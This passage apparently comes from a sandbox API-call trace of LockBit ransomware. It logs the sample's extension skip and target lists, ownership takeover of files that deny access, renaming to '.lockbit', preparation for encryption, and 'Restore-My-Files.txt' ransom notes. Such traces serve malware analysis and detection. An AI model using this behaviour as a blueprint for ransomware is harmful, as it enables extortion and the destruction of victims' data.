[0078.789] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.789] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.lockbit") returned 80 [0078.789] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.789] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.lockbit")) returned 0 [0078.789] GetLastError () returned 0x5 [0078.790] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.790] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.790] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.790] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.790] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.790] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.791] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.791] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.806] NtClose (Handle=0x3c0) returned 0x0 [0078.809] RtlFreeAnsiString (AnsiString="\\") [0078.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0078.809] malloc (_Size=0x200) returned 0x53fcc0 [0078.809] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.809] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.809] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.809] CloseHandle (hObject=0x3c0) returned 1 [0078.809] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.810] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.810] free (_Block=0x53fcc0) [0078.812] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.812] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.lockbit")) returned 1 [0078.813] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0078.813] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.813] malloc (_Size=0x40068) returned 0x206b860 [0078.813] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=8704) returned 1 [0078.813] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0078.820] GetLastError () returned 0x3e5 [0078.821] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.821] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.821] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.821] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0078.821] lstrcmpiW (lpString1=".", lpString2="mip.exe.mui") returned -1 [0078.821] lstrcmpiW (lpString1="..", lpString2="mip.exe.mui") returned -1 [0078.821] PathFindExtensionW (pszPath="mip.exe.mui") returned=".mui" [0078.821] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.821] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.821] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.821] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.821] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.822] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.822] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.823] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.823] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="mip.exe.mui") returned 1 [0078.823] lstrcmpiW (lpString1="ntldr", lpString2="mip.exe.mui") returned 1 [0078.823] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="mip.exe.mui") returned 1 [0078.823] lstrcmpiW (lpString1="bootsect.bak", lpString2="mip.exe.mui") returned -1 [0078.823] lstrcmpiW (lpString1="autorun.inf", lpString2="mip.exe.mui") returned -1 [0078.823] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.823] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned=".mui" [0078.823] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.823] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.823] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.823] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.824] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.824] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.824] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.824] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.824] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.824] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.824] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.lockbit") returned 77 [0078.824] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.824] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.lockbit")) returned 0 [0078.824] GetLastError () returned 0x5 [0078.825] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.825] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.825] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.825] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.825] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.825] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0079.023] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0079.023] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0079.152] NtClose (Handle=0x3c0) returned 0x0 [0079.152] RtlFreeAnsiString (AnsiString="\\") [0079.152] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0079.152] malloc (_Size=0x200) returned 0x53fcc0 [0079.152] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0079.152] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.153] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0079.153] CloseHandle (hObject=0x3c0) returned 1 [0079.153] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0079.155] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0079.156] free (_Block=0x53fcc0) [0079.156] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.156] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.lockbit")) returned 1 [0079.157] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0079.158] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0079.158] malloc (_Size=0x40068) returned 0x206b860 [0079.158] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=10240) returned 1 [0079.158] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0079.160] GetLastError () returned 0x3e5 [0079.160] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0079.160] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0079.160] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0079.160] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0079.160] lstrcmpiW (lpString1=".", lpString2="mshwLatin.dll.mui") returned -1 [0079.160] lstrcmpiW (lpString1="..", lpString2="mshwLatin.dll.mui") returned -1 [0079.161] PathFindExtensionW (pszPath="mshwLatin.dll.mui") returned=".mui" [0079.161] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0079.161] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0079.161] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0079.161] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0079.161] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0079.162] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0079.162] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0079.163] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0079.163] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0079.163] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="mshwLatin.dll.mui") returned 1 [0079.163] lstrcmpiW (lpString1="ntldr", lpString2="mshwLatin.dll.mui") returned 1 [0079.163] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="mshwLatin.dll.mui") returned 1 [0079.163] lstrcmpiW (lpString1="bootsect.bak", lpString2="mshwLatin.dll.mui") returned -1 [0079.163] lstrcmpiW (lpString1="autorun.inf", lpString2="mshwLatin.dll.mui") returned -1 [0079.163] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0079.163] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned=".mui" [0079.163] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0079.163] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0079.163] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0079.163] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0079.164] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0079.164] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0079.165] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0079.165] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.lockbit") returned 83 [0079.165] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0079.165] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui.lockbit")) returned 0 [0079.170] GetLastError () returned 0x5 [0079.170] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0079.170] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0079.170] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0079.171] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0079.171] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0079.171] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, 